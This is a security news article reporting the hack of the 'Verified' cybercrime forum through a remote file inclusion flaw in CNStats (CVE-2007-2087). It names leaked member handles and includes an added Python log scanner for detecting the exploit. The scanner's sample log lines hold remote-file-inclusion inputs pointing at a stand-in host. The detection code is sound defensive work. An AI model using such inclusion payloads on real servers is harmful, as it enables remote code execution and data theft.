
Large community of Eastern European cybercriminals, Verified, was hacked

One of the largest communities of Eastern European cybercriminals, “Verified”, was hacked; more than 18,894 bad actors were revealed after several hours.

According to sources at IntelCrawler, a cyberintelligence firm from Los Angeles, the largest community of Eastern European cybercriminals, “Verified”, was hacked several hours ago.

The hackers hit the online community late Tuesday, stealing member information and login credentials from the site’s forum database. It is still not confirmed, but the attackers could be members of a rival cyber gang managing a crime forum.

IntelCrawler is one of the most interesting players in the cyberintelligence landscape: a few weeks ago they discovered a Russian-speaking group offering bulletproof hosting in Syria and Lebanon, and just yesterday I published a post on another analysis by its specialists on vulnerabilities in VSAT terminals.

The event is considered serious in the underground communities: security and anonymity are fundamental requirements for the sales model known as fraud-as-a-service, and specialized forums like Verified offer products and services that criminal gangs use to further their illegal activities. The Verified forum specializes in online banking and financial fraud against organizations in the US, UK and Australia.

«It is a good example that there is insecurity in cybercriminal communities too, besides the resources they prefer to hack. Sometimes it helps investigators to find bad actors' profiles and to arrest them, doing deep e-crime intelligence» – commented IntelCrawler researchers.

The Verified data breach exposed all the attachments uploaded to the forum since 2011, and made it possible to download the MySQL database with all the cybercriminals' user accounts and credentials.

The attack was very smart: the hackers exploited a vulnerability in one of the third-party web applications used for traffic and statistics monitoring, «CNStats STD 4.3» (CVE-2007-2087).

“Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.” is the description of the vulnerability from the National Vulnerability Database.
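A defender-side check for the request pattern in the NVD description above, added here as an illustration and not taken from IntelCrawler or from this article: it flags access-log requests to reports/who_r.php or reports/who_s.php whose bn parameter carries a URL. The combined log format, the /stats/ install path and every sample line are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts named in the NVD text for CVE-2007-2087, both under reports/.
TARGET_SCRIPT = re.compile(r"/reports/who_[rs]\.php$", re.IGNORECASE)
# A parameter value that is a URL: "scheme://..." or protocol-relative "//...".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Client, request target and status from a common/combined log format line.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2014:10:00:00 +0000] '
    '"GET /stats/reports/who_r.php?bn=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2014:10:00:05 +0000] '
    '"GET /stats/reports/who_s.php?bn=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 403 199',
    '198.51.100.7 - - [01/Jan/2014:10:01:00 +0000] '
    '"GET /stats/reports/who_r.php?bn=3 HTTP/1.1" 200 2048',
    '198.51.100.8 - - [01/Jan/2014:10:02:00 +0000] '
    '"GET /forum/index.php?bn=http://example.invalid/ HTTP/1.1" 200 900',
]

def suspicious_bn(target):
    """Return the decoded bn value if the request fits the CVE pattern, else None."""
    parts = urlsplit(target)
    if not TARGET_SCRIPT.search(unquote(parts.path)):
        return None
    # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught as well.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "bn" and REMOTE_VALUE.match(value):
            return value
    return None

def scan(lines):
    """Return (client, status, bn value) for every matching request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        client, target, status = m.groups()
        value = suspicious_bn(target)
        if value is not None:
            hits.append((client, status, value))
    return hits

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} bn={value}")
```

A hit answered with status 200 shows that the script under reports/ was served rather than blocked, which corresponds to the “.htaccess is not recognized” precondition in the NVD text.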

 

The database was uploaded to Sendspace and, according to operative information, those responsible for the attack are the owners of another cybercriminal forum.

Taking a closer look at the database dump, it is possible to find the names of popular cybercriminals, including the famous spammer “SEVERA”, former partner of Alan Ralsky, arrested by US LEA. “Severa” is also widely known as a spammer who had one of the first spam services on the famous underground forum “Carberplant”, closed by LEA quite a long time ago. On January 8th, 2014 the Ukrainian SBU announced the arrest of the hacker “4×4” (UA); “4×4” was also a member of the hacked Verified forum, as were other famous cybercriminals such as Zoomer and KrenJo (very famous dumps sellers from Eastern Europe).

“4×4”: “Aren’t you working with OPTIVA trojan? If – yes, there is large deal for it”, states one of the translated, extracted private messages. The OPTIVA trojan is one of the private banking trojans they used for online-banking theft.

By the way, Zoomer was mentioned in the New York Times in 2005, and by RSA as well, as a very serious dumps seller.

Some of the user accounts are dated: they were created in 2005, when the community was just created. In terms of security, most of the users are using e-mails in various jurisdictions and “safe-mail.net”.

The community, born in 2005, became very popular for trading new exploit kits; Paunch, the author of the “Blackhole” exploit kit, was one of the advertisers there.

Pierluigi Paganini

(Security Affairs –  Verified forum, cybercrime)
